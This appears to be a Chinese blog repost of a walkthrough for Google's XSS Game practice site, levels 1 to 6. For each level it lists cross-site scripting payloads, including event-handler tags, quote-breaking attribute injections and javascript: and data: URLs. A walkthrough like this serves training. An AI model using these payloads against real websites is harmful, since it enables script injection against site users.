https://xss-game.appspot.com/level1

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

 

Google XSS Challenge Safe 第1张

 

https://xss-game.appspot.com/level1

payload: <svg onload=alert(1)>

Google XSS Challenge Safe 第2张

https://xss-game.appspot.com/level2

过滤掉了<script>关键词

payloads:

<svg onload=alert(1)>

<input autofocus onfocus=alert(1)>

<video><source onerror="JavaScript:alert(1)">

<marquee onstart=alert(1)>

Google XSS Challenge Safe 第3张

 

https://xss-game.appspot.com/level3

payload1: ' onerror='alert(1)' >

payload2: ' onmouseover=alert(1)//

Google XSS Challenge Safe 第4张

Google XSS Challenge Safe 第5张

 

https://xss-game.appspot.com/level4

sourcecode:

<img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />

payload1:  5'),alert('1

payload2:  5'),alert('1')//

Google XSS Challenge Safe 第6张

 

https://xss-game.appspot.com/level5

payload: javascript:alert(1)

Google XSS Challenge Safe 第7张

 

https://xss-game.appspot.com/level6

payload: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('1')

Google XSS Challenge Safe 第8张

 

Google XSS Challenge Safe 第9张

 

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄